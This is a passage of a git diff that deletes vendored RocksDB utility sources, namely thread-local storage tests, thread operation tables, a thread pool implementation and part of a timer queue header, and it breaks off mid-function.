-    mu.Unlock();
-
-    ASSERT_EQ(unref_count, 0);
-
-    // Scrape all thread local data. No unref at thread
-    // exit or ThreadLocalPtr destruction
-    autovector<void*> ptrs;
-    p.tls1.Scrape(&ptrs, nullptr);
-    p.tls2->Scrape(&ptrs, nullptr);
-    delete p.tls2;
-    // Signal to exit
-    mu.Lock();
-    p.completed = 0;
-    cv.SignalAll();
-    mu.Unlock();
-    env_->WaitForJoin();
-
-    ASSERT_EQ(unref_count, 0);
-  }
-}
-
-TEST_F(ThreadLocalTest, Fold) {
-  auto unref = [](void* ptr) {
-    delete static_cast<std::atomic<int64_t>*>(ptr);
-  };
-  static const int kNumThreads = 16;
-  static const int kItersPerThread = 10;
-  port::Mutex mu;
-  port::CondVar cv(&mu);
-  Params params(&mu, &cv, nullptr, kNumThreads, unref);
-  auto func = [](void* ptr) {
-    auto& p = *static_cast<Params*>(ptr);
-    ASSERT_TRUE(p.tls1.Get() == nullptr);
-    p.tls1.Reset(new std::atomic<int64_t>(0));
-
-    for (int i = 0; i < kItersPerThread; ++i) {
-      static_cast<std::atomic<int64_t>*>(p.tls1.Get())->fetch_add(1);
-    }
-
-    p.mu->Lock();
-    ++(p.completed);
-    p.cv->SignalAll();
-
-    // Waiting for instruction to exit thread
-    while (p.completed != 0) {
-      p.cv->Wait();
-    }
-    p.mu->Unlock();
-  };
-
-  for (int th = 0; th < params.total; ++th) {
-    env_->StartThread(func, static_cast<void*>(&params));
-  }
-
-  // Wait for all threads to finish using Params
-  mu.Lock();
-  while (params.completed != params.total) {
-    cv.Wait();
-  }
-  mu.Unlock();
-
-  // Verify Fold() behavior
-  int64_t sum = 0;
-  params.tls1.Fold(
-      [](void* ptr, void* res) {
-        auto sum_ptr = static_cast<int64_t*>(res);
-        *sum_ptr += static_cast<std::atomic<int64_t>*>(ptr)->load();
-      },
-      &sum);
-  ASSERT_EQ(sum, kNumThreads * kItersPerThread);
-
-  // Signal to exit
-  mu.Lock();
-  params.completed = 0;
-  cv.SignalAll();
-  mu.Unlock();
-  env_->WaitForJoin();
-}
-
-TEST_F(ThreadLocalTest, CompareAndSwap) {
-  ThreadLocalPtr tls;
-  ASSERT_TRUE(tls.Swap(reinterpret_cast<void*>(1)) == nullptr);
-  void* expected = reinterpret_cast<void*>(1);
-  // Swap in 2
-  ASSERT_TRUE(tls.CompareAndSwap(reinterpret_cast<void*>(2), expected));
-  expected = reinterpret_cast<void*>(100);
-  // Fail Swap, still 2
-  ASSERT_TRUE(!tls.CompareAndSwap(reinterpret_cast<void*>(2), expected));
-  ASSERT_EQ(expected, reinterpret_cast<void*>(2));
-  // Swap in 3
-  expected = reinterpret_cast<void*>(2);
-  ASSERT_TRUE(tls.CompareAndSwap(reinterpret_cast<void*>(3), expected));
-  ASSERT_EQ(tls.Get(), reinterpret_cast<void*>(3));
-}
-
-namespace {
-
-void* AccessThreadLocal(void* arg) {
-  TEST_SYNC_POINT("AccessThreadLocal:Start");
-  ThreadLocalPtr tlp;
-  tlp.Reset(new std::string("hello RocksDB"));
-  TEST_SYNC_POINT("AccessThreadLocal:End");
-  return nullptr;
-}
-
-}  // namespace
-
-// The following test is disabled as it requires manual steps to run it
-// correctly.
-//
-// Currently we have no way to acess SyncPoint w/o ASAN error when the
-// child thread dies after the main thread dies.  So if you manually enable
-// this test and only see an ASAN error on SyncPoint, it means you pass the
-// test.
-TEST_F(ThreadLocalTest, DISABLED_MainThreadDiesFirst) {
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"AccessThreadLocal:Start", "MainThreadDiesFirst:End"},
-       {"PosixEnv::~PosixEnv():End", "AccessThreadLocal:End"}});
-
-  // Triggers the initialization of singletons.
-  Env::Default();
-
-#ifndef ROCKSDB_LITE
-  try {
-#endif  // ROCKSDB_LITE
-    rocksdb::port::Thread th(&AccessThreadLocal, nullptr);
-    th.detach();
-    TEST_SYNC_POINT("MainThreadDiesFirst:End");
-#ifndef ROCKSDB_LITE
-  } catch (const std::system_error& ex) {
-    std::cerr << "Start thread: " << ex.code() << std::endl;
-    FAIL();
-  }
-#endif  // ROCKSDB_LITE
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/thread_operation.h b/thirdparty/rocksdb/util/thread_operation.h
deleted file mode 100644
index 025392b..0000000
--- a/thirdparty/rocksdb/util/thread_operation.h
+++ /dev/null
@@ -1,121 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file defines the structures for thread operation and state.
-// Thread operations are used to describe high level action of a
-// thread such as doing compaction or flush, while thread state
-// are used to describe lower-level action such as reading /
-// writing a file or waiting for a mutex.  Operations and states
-// are designed to be independent.  Typically, a thread usually involves
-// in one operation and one state at any specific point in time.
-
-#pragma once
-
-#include "rocksdb/thread_status.h"
-
-#include <string>
-
-namespace rocksdb {
-
-#ifdef ROCKSDB_USING_THREAD_STATUS
-
-// The structure that describes a major thread operation.
-struct OperationInfo {
-  const ThreadStatus::OperationType type;
-  const std::string name;
-};
-
-// The global operation table.
-//
-// When updating a status of a thread, the pointer of the OperationInfo
-// of the current ThreadStatusData will be pointing to one of the
-// rows in this global table.
-//
-// Note that it's not designed to be constant as in the future we
-// might consider adding global count to the OperationInfo.
-static OperationInfo global_operation_table[] = {
-  {ThreadStatus::OP_UNKNOWN, ""},
-  {ThreadStatus::OP_COMPACTION, "Compaction"},
-  {ThreadStatus::OP_FLUSH, "Flush"}
-};
-
-struct OperationStageInfo {
-  const ThreadStatus::OperationStage stage;
-  const std::string name;
-};
-
-// A table maintains the mapping from stage type to stage string.
-// Note that the string must be changed accordingly when the
-// associated function name changed.
-static OperationStageInfo global_op_stage_table[] = {
-  {ThreadStatus::STAGE_UNKNOWN, ""},
-  {ThreadStatus::STAGE_FLUSH_RUN,
-      "FlushJob::Run"},
-  {ThreadStatus::STAGE_FLUSH_WRITE_L0,
-      "FlushJob::WriteLevel0Table"},
-  {ThreadStatus::STAGE_COMPACTION_PREPARE,
-      "CompactionJob::Prepare"},
-  {ThreadStatus::STAGE_COMPACTION_RUN,
-      "CompactionJob::Run"},
-  {ThreadStatus::STAGE_COMPACTION_PROCESS_KV,
-      "CompactionJob::ProcessKeyValueCompaction"},
-  {ThreadStatus::STAGE_COMPACTION_INSTALL,
-      "CompactionJob::Install"},
-  {ThreadStatus::STAGE_COMPACTION_SYNC_FILE,
-      "CompactionJob::FinishCompactionOutputFile"},
-  {ThreadStatus::STAGE_PICK_MEMTABLES_TO_FLUSH,
-      "MemTableList::PickMemtablesToFlush"},
-  {ThreadStatus::STAGE_MEMTABLE_ROLLBACK,
-      "MemTableList::RollbackMemtableFlush"},
-  {ThreadStatus::STAGE_MEMTABLE_INSTALL_FLUSH_RESULTS,
-      "MemTableList::InstallMemtableFlushResults"},
-};
-
-// The structure that describes a state.
-struct StateInfo {
-  const ThreadStatus::StateType type;
-  const std::string name;
-};
-
-// The global state table.
-//
-// When updating a status of a thread, the pointer of the StateInfo
-// of the current ThreadStatusData will be pointing to one of the
-// rows in this global table.
-static StateInfo global_state_table[] = {
-  {ThreadStatus::STATE_UNKNOWN, ""},
-  {ThreadStatus::STATE_MUTEX_WAIT, "Mutex Wait"},
-};
-
-struct OperationProperty {
-  int code;
-  std::string name;
-};
-
-static OperationProperty compaction_operation_properties[] = {
-  {ThreadStatus::COMPACTION_JOB_ID, "JobID"},
-  {ThreadStatus::COMPACTION_INPUT_OUTPUT_LEVEL, "InputOutputLevel"},
-  {ThreadStatus::COMPACTION_PROP_FLAGS, "Manual/Deletion/Trivial"},
-  {ThreadStatus::COMPACTION_TOTAL_INPUT_BYTES, "TotalInputBytes"},
-  {ThreadStatus::COMPACTION_BYTES_READ, "BytesRead"},
-  {ThreadStatus::COMPACTION_BYTES_WRITTEN, "BytesWritten"},
-};
-
-static OperationProperty flush_operation_properties[] = {
-  {ThreadStatus::FLUSH_JOB_ID, "JobID"},
-  {ThreadStatus::FLUSH_BYTES_MEMTABLES, "BytesMemtables"},
-  {ThreadStatus::FLUSH_BYTES_WRITTEN, "BytesWritten"}
-};
-
-#else
-
-struct OperationInfo {
-};
-
-struct StateInfo {
-};
-
-#endif  // ROCKSDB_USING_THREAD_STATUS
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/threadpool_imp.cc b/thirdparty/rocksdb/util/threadpool_imp.cc
deleted file mode 100644
index f38e642..0000000
--- a/thirdparty/rocksdb/util/threadpool_imp.cc
+++ /dev/null
@@ -1,460 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/threadpool_imp.h"
-
-#include "monitoring/thread_status_util.h"
-#include "port/port.h"
-
-#ifndef OS_WIN
-#  include <unistd.h>
-#endif
-
-#ifdef OS_LINUX
-#  include <sys/syscall.h>
-#endif
-
-#include <algorithm>
-#include <atomic>
-#include <condition_variable>
-#include <mutex>
-#include <stdlib.h>
-#include <thread>
-#include <vector>
-
-namespace rocksdb {
-
-void ThreadPoolImpl::PthreadCall(const char* label, int result) {
-  if (result != 0) {
-    fprintf(stderr, "pthread %s: %s\n", label, strerror(result));
-    abort();
-  }
-}
-
-struct ThreadPoolImpl::Impl {
-
-  Impl();
-  ~Impl();
-
-  void JoinThreads(bool wait_for_jobs_to_complete);
-
-  void SetBackgroundThreadsInternal(int num, bool allow_reduce);
-  int GetBackgroundThreads();
-
-  unsigned int GetQueueLen() const {
-    return queue_len_.load(std::memory_order_relaxed);
-  }
-
-  void LowerIOPriority();
-
-  void WakeUpAllThreads() {
-    bgsignal_.notify_all();
-  }
-
-  void BGThread(size_t thread_id);
-
-  void StartBGThreads();
-
-  void Submit(std::function<void()>&& schedule,
-    std::function<void()>&& unschedule, void* tag);
-
-  int UnSchedule(void* arg);
-
-  void SetHostEnv(Env* env) { env_ = env; }
-
-  Env* GetHostEnv() const { return env_; }
-
-  bool HasExcessiveThread() const {
-    return static_cast<int>(bgthreads_.size()) > total_threads_limit_;
-  }
-
-  // Return true iff the current thread is the excessive thread to terminate.
-  // Always terminate the running thread that is added last, even if there are
-  // more than one thread to terminate.
-  bool IsLastExcessiveThread(size_t thread_id) const {
-    return HasExcessiveThread() && thread_id == bgthreads_.size() - 1;
-  }
-
-  bool IsExcessiveThread(size_t thread_id) const {
-    return static_cast<int>(thread_id) >= total_threads_limit_;
-  }
-
-  // Return the thread priority.
-  // This would allow its member-thread to know its priority.
-  Env::Priority GetThreadPriority() const { return priority_; }
-
-  // Set the thread priority.
-  void SetThreadPriority(Env::Priority priority) { priority_ = priority; }
-
-private:
-
-  static void* BGThreadWrapper(void* arg);
-
-  bool low_io_priority_;
-  Env::Priority priority_;
-  Env*         env_;
-
-  int total_threads_limit_;
-  std::atomic_uint queue_len_;  // Queue length. Used for stats reporting
-  bool exit_all_threads_;
-  bool wait_for_jobs_to_complete_;
-
-  // Entry per Schedule()/Submit() call
-  struct BGItem {
-    void* tag = nullptr;
-    std::function<void()> function;
-    std::function<void()> unschedFunction;
-  };
-
-  using BGQueue = std::deque<BGItem>;
-  BGQueue       queue_;
-
-  std::mutex               mu_;
-  std::condition_variable  bgsignal_;
-  std::vector<port::Thread> bgthreads_;
-};
-
-
-inline
-ThreadPoolImpl::Impl::Impl()
-    :
-      low_io_priority_(false),
-      priority_(Env::LOW),
-      env_(nullptr),
-      total_threads_limit_(0),
-      queue_len_(),
-      exit_all_threads_(false),
-      wait_for_jobs_to_complete_(false),
-      queue_(),
-      mu_(),
-      bgsignal_(),
-      bgthreads_() {
-}
-
-inline
-ThreadPoolImpl::Impl::~Impl() { assert(bgthreads_.size() == 0U); }
-
-void ThreadPoolImpl::Impl::JoinThreads(bool wait_for_jobs_to_complete) {
-
-  std::unique_lock<std::mutex> lock(mu_);
-  assert(!exit_all_threads_);
-
-  wait_for_jobs_to_complete_ = wait_for_jobs_to_complete;
-  exit_all_threads_ = true;
-
-  lock.unlock();
-
-  bgsignal_.notify_all();
-
-  for (auto& th : bgthreads_) {
-    th.join();
-  }
-
-  bgthreads_.clear();
-
-  exit_all_threads_ = false;
-  wait_for_jobs_to_complete_ = false;
-}
-
-inline
-void ThreadPoolImpl::Impl::LowerIOPriority() {
-  std::lock_guard<std::mutex> lock(mu_);
-  low_io_priority_ = true;
-}
-
-
-void ThreadPoolImpl::Impl::BGThread(size_t thread_id) {
-  bool low_io_priority = false;
-  while (true) {
-// Wait until there is an item that is ready to run
-    std::unique_lock<std::mutex> lock(mu_);
-    // Stop waiting if the thread needs to do work or needs to terminate.
-    while (!exit_all_threads_ && !IsLastExcessiveThread(thread_id) &&
-           (queue_.empty() || IsExcessiveThread(thread_id))) {
-      bgsignal_.wait(lock);
-    }
-
-    if (exit_all_threads_) {  // mechanism to let BG threads exit safely
-
-      if(!wait_for_jobs_to_complete_ ||
-          queue_.empty()) {
-        break;
-       }
-    }
-
-    if (IsLastExcessiveThread(thread_id)) {
-      // Current thread is the last generated one and is excessive.
-      // We always terminate excessive thread in the reverse order of
-      // generation time.
-      auto& terminating_thread = bgthreads_.back();
-      terminating_thread.detach();
-      bgthreads_.pop_back();
-
-      if (HasExcessiveThread()) {
-        // There is still at least more excessive thread to terminate.
-        WakeUpAllThreads();
-      }
-      break;
-    }
-
-    auto func = std::move(queue_.front().function);
-    queue_.pop_front();
-
-    queue_len_.store(static_cast<unsigned int>(queue_.size()),
-                     std::memory_order_relaxed);
-
-    bool decrease_io_priority = (low_io_priority != low_io_priority_);
-    lock.unlock();
-
-#ifdef OS_LINUX
-    if (decrease_io_priority) {
-#define IOPRIO_CLASS_SHIFT (13)
-#define IOPRIO_PRIO_VALUE(class, data) (((class) << IOPRIO_CLASS_SHIFT) | data)
-      // Put schedule into IOPRIO_CLASS_IDLE class (lowest)
-      // These system calls only have an effect when used in conjunction
-      // with an I/O scheduler that supports I/O priorities. As at
-      // kernel 2.6.17 the only such scheduler is the Completely
-      // Fair Queuing (CFQ) I/O scheduler.
-      // To change scheduler:
-      //  echo cfq > /sys/block/<device_name>/queue/schedule
-      // Tunables to consider:
-      //  /sys/block/<device_name>/queue/slice_idle
-      //  /sys/block/<device_name>/queue/slice_sync
-      syscall(SYS_ioprio_set, 1,  // IOPRIO_WHO_PROCESS
-              0,                  // current thread
-              IOPRIO_PRIO_VALUE(3, 0));
-      low_io_priority = true;
-    }
-#else
-    (void)decrease_io_priority;  // avoid 'unused variable' error
-#endif
-    func();
-  }
-}
-
-// Helper struct for passing arguments when creating threads.
-struct BGThreadMetadata {
-  ThreadPoolImpl::Impl* thread_pool_;
-  size_t thread_id_;  // Thread count in the thread.
-  BGThreadMetadata(ThreadPoolImpl::Impl* thread_pool, size_t thread_id)
-      : thread_pool_(thread_pool), thread_id_(thread_id) {}
-};
-
-void* ThreadPoolImpl::Impl::BGThreadWrapper(void* arg) {
-  BGThreadMetadata* meta = reinterpret_cast<BGThreadMetadata*>(arg);
-  size_t thread_id = meta->thread_id_;
-  ThreadPoolImpl::Impl* tp = meta->thread_pool_;
-#ifdef ROCKSDB_USING_THREAD_STATUS
-  // for thread-status
-  ThreadStatusUtil::RegisterThread(
-      tp->GetHostEnv(), (tp->GetThreadPriority() == Env::Priority::HIGH
-                             ? ThreadStatus::HIGH_PRIORITY
-                             : ThreadStatus::LOW_PRIORITY));
-#endif
-  delete meta;
-  tp->BGThread(thread_id);
-#ifdef ROCKSDB_USING_THREAD_STATUS
-  ThreadStatusUtil::UnregisterThread();
-#endif
-  return nullptr;
-}
-
-void ThreadPoolImpl::Impl::SetBackgroundThreadsInternal(int num,
-  bool allow_reduce) {
-  std::unique_lock<std::mutex> lock(mu_);
-  if (exit_all_threads_) {
-    lock.unlock();
-    return;
-  }
-  if (num > total_threads_limit_ ||
-      (num < total_threads_limit_ && allow_reduce)) {
-    total_threads_limit_ = std::max(0, num);
-    WakeUpAllThreads();
-    StartBGThreads();
-  }
-}
-
-int ThreadPoolImpl::Impl::GetBackgroundThreads() {
-  std::unique_lock<std::mutex> lock(mu_);
-  return total_threads_limit_;
-}
-
-void ThreadPoolImpl::Impl::StartBGThreads() {
-  // Start background thread if necessary
-  while ((int)bgthreads_.size() < total_threads_limit_) {
-
-    port::Thread p_t(&BGThreadWrapper,
-      new BGThreadMetadata(this, bgthreads_.size()));
-
-// Set the thread name to aid debugging
-#if defined(_GNU_SOURCE) && defined(__GLIBC_PREREQ)
-#if __GLIBC_PREREQ(2, 12)
-    auto th_handle = p_t.native_handle();
-    char name_buf[16];
-    snprintf(name_buf, sizeof name_buf, "rocksdb:bg%" ROCKSDB_PRIszt,
-             bgthreads_.size());
-    name_buf[sizeof name_buf - 1] = '\0';
-    pthread_setname_np(th_handle, name_buf);
-#endif
-#endif
-    bgthreads_.push_back(std::move(p_t));
-  }
-}
-
-void ThreadPoolImpl::Impl::Submit(std::function<void()>&& schedule,
-  std::function<void()>&& unschedule, void* tag) {
-
-  std::lock_guard<std::mutex> lock(mu_);
-
-  if (exit_all_threads_) {
-    return;
-  }
-
-  StartBGThreads();
-
-  // Add to priority queue
-  queue_.push_back(BGItem());
-
-  auto& item = queue_.back();
-  item.tag = tag;
-  item.function = std::move(schedule);
-  item.unschedFunction = std::move(unschedule);
-
-  queue_len_.store(static_cast<unsigned int>(queue_.size()),
-    std::memory_order_relaxed);
-
-  if (!HasExcessiveThread()) {
-    // Wake up at least one waiting thread.
-    bgsignal_.notify_one();
-  } else {
-    // Need to wake up all threads to make sure the one woken
-    // up is not the one to terminate.
-    WakeUpAllThreads();
-  }
-}
-
-int ThreadPoolImpl::Impl::UnSchedule(void* arg) {
-  int count = 0;
-
-  std::vector<std::function<void()>> candidates;
-  {
-    std::lock_guard<std::mutex> lock(mu_);
-
-    // Remove from priority queue
-    BGQueue::iterator it = queue_.begin();
-    while (it != queue_.end()) {
-      if (arg == (*it).tag) {
-        if (it->unschedFunction) {
-          candidates.push_back(std::move(it->unschedFunction));
-        }
-        it = queue_.erase(it);
-        count++;
-      } else {
-        ++it;
-      }
-    }
-    queue_len_.store(static_cast<unsigned int>(queue_.size()),
-      std::memory_order_relaxed);
-  }
-
-
- // Run unschedule functions outside the mutex
-  for (auto& f : candidates) {
-    f();
-  }
-
-  return count;
-}
-
-ThreadPoolImpl::ThreadPoolImpl() :
-  impl_(new Impl()) {
-}
-
-
-ThreadPoolImpl::~ThreadPoolImpl() {
-}
-
-void ThreadPoolImpl::JoinAllThreads() {
-  impl_->JoinThreads(false);
-}
-
-void ThreadPoolImpl::SetBackgroundThreads(int num) {
-  impl_->SetBackgroundThreadsInternal(num, true);
-}
-
-int ThreadPoolImpl::GetBackgroundThreads() {
-  return impl_->GetBackgroundThreads();
-}
-
-unsigned int ThreadPoolImpl::GetQueueLen() const {
-  return impl_->GetQueueLen();
-}
-
-void ThreadPoolImpl::WaitForJobsAndJoinAllThreads() {
-  impl_->JoinThreads(true);
-}
-
-void ThreadPoolImpl::LowerIOPriority() {
-  impl_->LowerIOPriority();
-}
-
-void ThreadPoolImpl::IncBackgroundThreadsIfNeeded(int num) {
-  impl_->SetBackgroundThreadsInternal(num, false);
-}
-
-void ThreadPoolImpl::SubmitJob(const std::function<void()>& job) {
-  auto copy(job);
-  impl_->Submit(std::move(copy), std::function<void()>(), nullptr);
-}
-
-
-void ThreadPoolImpl::SubmitJob(std::function<void()>&& job) {
-  impl_->Submit(std::move(job), std::function<void()>(), nullptr);
-}
-
-void ThreadPoolImpl::Schedule(void(*function)(void* arg1), void* arg,
-  void* tag, void(*unschedFunction)(void* arg)) {
-
-  std::function<void()> fn = [arg, function] { function(arg); };
-
-  std::function<void()> unfn;
-  if (unschedFunction != nullptr) {
-    auto uf = [arg, unschedFunction] { unschedFunction(arg); };
-    unfn = std::move(uf);
-  }
-
-  impl_->Submit(std::move(fn), std::move(unfn), tag);
-}
-
-int ThreadPoolImpl::UnSchedule(void* arg) {
-  return impl_->UnSchedule(arg);
-}
-
-void ThreadPoolImpl::SetHostEnv(Env* env) { impl_->SetHostEnv(env); }
-
-Env* ThreadPoolImpl::GetHostEnv() const { return impl_->GetHostEnv(); }
-
-// Return the thread priority.
-// This would allow its member-thread to know its priority.
-Env::Priority ThreadPoolImpl::GetThreadPriority() const {
-  return impl_->GetThreadPriority();
-}
-
-// Set the thread priority.
-void ThreadPoolImpl::SetThreadPriority(Env::Priority priority) {
-  impl_->SetThreadPriority(priority);
-}
-
-ThreadPool* NewThreadPool(int num_threads) {
-  ThreadPoolImpl* thread_pool = new ThreadPoolImpl();
-  thread_pool->SetBackgroundThreads(num_threads);
-  return thread_pool;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/threadpool_imp.h b/thirdparty/rocksdb/util/threadpool_imp.h
deleted file mode 100644
index cced19b..0000000
--- a/thirdparty/rocksdb/util/threadpool_imp.h
+++ /dev/null
@@ -1,109 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include "rocksdb/threadpool.h"
-#include "rocksdb/env.h"
-
-#include <memory>
-#include <functional>
-
-namespace rocksdb {
-
-
-class ThreadPoolImpl : public ThreadPool {
- public:
-  ThreadPoolImpl();
-  ~ThreadPoolImpl();
-
-  ThreadPoolImpl(ThreadPoolImpl&&) = delete;
-  ThreadPoolImpl& operator=(ThreadPoolImpl&&) = delete;
-
-  // Implement ThreadPool interfaces
-
-  // Wait for all threads to finish.
-  // Discards all the jobs that did not
-  // start executing and waits for those running
-  // to complete
-  void JoinAllThreads() override;
-
-  // Set the number of background threads that will be executing the
-  // scheduled jobs.
-  void SetBackgroundThreads(int num) override;
-  int GetBackgroundThreads() override;
-
-  // Get the number of jobs scheduled in the ThreadPool queue.
-  unsigned int GetQueueLen() const override;
-
-  // Waits for all jobs to complete those
-  // that already started running and those that did not
-  // start yet
-  void WaitForJobsAndJoinAllThreads() override;
-
-  // Make threads to run at a lower kernel priority
-  // Currently only has effect on Linux
-  void LowerIOPriority();
-
-  // Ensure there is at aleast num threads in the pool
-  // but do not kill threads if there are more
-  void IncBackgroundThreadsIfNeeded(int num);
-
-  // Submit a fire and forget job
-  // These jobs can not be unscheduled
-
-  // This allows to submit the same job multiple times
-  void SubmitJob(const std::function<void()>&) override;
-  // This moves the function in for efficiency
-  void SubmitJob(std::function<void()>&&) override;
-
-  // Schedule a job with an unschedule tag and unschedule function
-  // Can be used to filter and unschedule jobs by a tag
-  // that are still in the queue and did not start running
-  void Schedule(void (*function)(void* arg1), void* arg, void* tag,
-                void (*unschedFunction)(void* arg));
-
-  // Filter jobs that are still in a queue and match
-  // the given tag. Remove them from a queue if any
-  // and for each such job execute an unschedule function
-  // if such was given at scheduling time.
-  int UnSchedule(void* tag);
-
-  void SetHostEnv(Env* env);
-
-  Env* GetHostEnv() const;
-
-  // Return the thread priority.
-  // This would allow its member-thread to know its priority.
-  Env::Priority GetThreadPriority() const;
-
-  // Set the thread priority.
-  void SetThreadPriority(Env::Priority priority);
-
-  static void PthreadCall(const char* label, int result);
-
-  struct Impl;
-
- private:
-
-   // Current public virtual interface does not provide usable
-   // functionality and thus can not be used internally to
-   // facade different implementations.
-   //
-   // We propose a pimpl idiom in order to easily replace the thread pool impl
-   // w/o touching the header file but providing a different .cc potentially
-   // CMake option driven.
-   //
-   // Another option is to introduce a Env::MakeThreadPool() virtual interface
-   // and override the environment. This would require refactoring ThreadPool usage.
-   //
-   // We can also combine these two approaches
-   std::unique_ptr<Impl>   impl_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/timer_queue.h b/thirdparty/rocksdb/util/timer_queue.h
deleted file mode 100644
index f068ffe..0000000
--- a/thirdparty/rocksdb/util/timer_queue.h
+++ /dev/null
@@ -1,220 +0,0 @@
-//  Portions Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Borrowed from
-// http://www.crazygaze.com/blog/2016/03/24/portable-c-timer-queue/
-// Timer Queue
-//
-// License
-//
-// The source code in this article is licensed under the CC0 license, so feel
-// free to copy, modify, share, do whatever you want with it.
-// No attribution is required, but Ill be happy if you do.
-// CC0 license
-
-// The person who associated a work with this deed has dedicated the work to the
-// public domain by waiving all of his or her rights to the work worldwide
-// under copyright law, including all related and neighboring rights, to the
-// extent allowed by law.  You can copy, modify, distribute and perform the
-// work, even for commercial purposes, all without asking permission.
-
-#pragma once
-
-#include "port/port.h"
-
-#include <assert.h>
-#include <chrono>
-#include <condition_variable>
-#include <functional>
-#include <queue>
-#include <thread>
-#include <utility>
-#include <vector>
-
-// Allows execution of handlers at a specified time in the future
-// Guarantees:
-//  - All handlers are executed ONCE, even if cancelled (aborted parameter will
-// be set to true)
-//      - If TimerQueue is destroyed, it will cancel all handlers.
-//  - Handlers are ALWAYS executed in the Timer Queue worker thread.
-//  - Handlers execution order is NOT guaranteed
-//
-////////////////////////////////////////////////////////////////////////////////
-// borrowed from
-// http://www.crazygaze.com/blog/2016/03/24/portable-c-timer-queue/
-class TimerQueue {
- public:
-  TimerQueue() : m_th(&TimerQueue::run, this) {}
-
-  ~TimerQueue() {
-    cancelAll();
-    // Abusing the timer queue to trigger the shutdown.
-    add(0, [this](bool) {
-      m_finish = true;
-      return std::make_pair(false, 0);
-    });
-    m_th.join();
-  }
-
-  // Adds a new timer
-  // \return
-  //  Returns the ID of the new timer. You can use this ID to cancel the
-  // timer
-  uint64_t add(int64_t milliseconds,
-               std::function<std::pair<bool, int64_t>(bool)> handler) {
-    WorkItem item;
-    Clock::time_point tp = Clock::now();
-    item.end = tp + std::chrono::milliseconds(milliseconds);
-    item.period = milliseconds;
-    item.handler = std::move(handler);
-
-    std::unique_lock<std::mutex> lk(m_mtx);
-    uint64_t id = ++m_idcounter;
-    item.id = id;
-    m_items.push(std::move(item));
-
-    // Something changed, so wake up timer thread
-    m_checkWork.notify_one();
-    return id;
-  }
-
-  // Cancels the specified timer
-  // \return
-  //  1 if the timer was cancelled.
-  //  0 if you were too late to cancel (or the timer ID was never valid to
-  // start with)
-  size_t cancel(uint64_t id) {
-    // Instead of removing the item from the container (thus breaking the
-    // heap integrity), we set the item as having no handler, and put
-    // that handler on a new item at the top for immediate execution
-    // The timer thread will then ignore the original item, since it has no
-    // handler.
-    std::unique_lock<std::mutex> lk(m_mtx);
-    for (auto&& item : m_items.getContainer()) {
-      if (item.id == id && item.handler) {
-        WorkItem newItem;
-        // Zero time, so it stays at the top for immediate execution
-        newItem.end = Clock::time_point();
-        newItem.id = 0;  // Means it is a canceled item
-        // Move the handler from item to newitem (thus clearing item)
-        newItem.handler = std::move(item.handler);
-        m_items.push(std::move(newItem));
-
-        // Something changed, so wake up timer thread
-        m_checkWork.notify_one();
-        return 1;
-      }
-    }
-    return 0;
-  }
-
-  // Cancels all timers
-  // \return
-  //  The number of timers cancelled
-  size_t cancelAll() {
-    // Setting all "end" to 0 (for immediate execution) is ok,
-    // since it maintains the heap integrity
-    std::unique_lock<std::mutex> lk(m_mtx);
-    m_cancel = true;
-    for (auto&& item : m_items.getContainer()) {
-      if (item.id && item.handler) {
-        item.end = Clock::time_point();
-        item.id = 0;
-      }
-    }
-    auto ret = m_items.size();
-
-    m_checkWork.notify_one();
-    return ret;
-  }
-
- private:
-  using Clock = std::chrono::steady_clock;
-  TimerQueue(const TimerQueue&) = delete;
-  TimerQueue& operator=(const TimerQueue&) = delete;
-
-  void run() {
-    std::unique_lock<std::mutex> lk(m_mtx);
-    while (!m_finish) {
-      auto end = calcWaitTime_lock();
-      if (end.first) {
-        // Timers found, so wait until it expires (or something else
-        // changes)
-        m_checkWork.wait_until(lk, end.second);
-      } else {
-        // No timers exist, so wait forever until something changes
-        m_checkWork.wait(lk);
-      }
-
-      // Check and execute as much work as possible, such as, all expired
-      // timers
-      checkWork(&lk);
-    }
-
-    // If we are shutting down, we should not have any items left,
-    // since the shutdown cancels all items
-    assert(m_items.size() == 0);
-  }
-
-  std::pair<bool, Clock::time_point> calcWaitTime_lock() {
-    while (m_items.size()) {
-      if (m_items.top().handler) {
-        // Item present, so return the new wait time
-        return std::make_pair(true, m_items.top().end);
-      } else {
-        // Discard empty handlers (they were cancelled)
-        m_items.pop();
-      }
-    }
-
-    // No items found, so return no wait time (causes the thread to wait
-    // indefinitely)
-    return std::make_pair(false, Clock::time_point());
-  }
-
-  void checkWork(std::unique_lock<std::mutex>* lk) {
-    while (m_items.size() && m_items.top().end <= Clock::now()) {
-      WorkItem item(m_items.top());
-      m_items.pop();
-
-      if (item.handler) {
-        (*lk).unlock();
-        auto reschedule_pair = item.handler(item.id == 0);
-        (*lk).lock();
-        if (!m_cancel && reschedule_pair.first) {
-          int64_t new_period = (reschedule_pair.second == -1)
-                                   ? item.period
-                                   : reschedule_pair.second;
-
-          item.period = new_period;
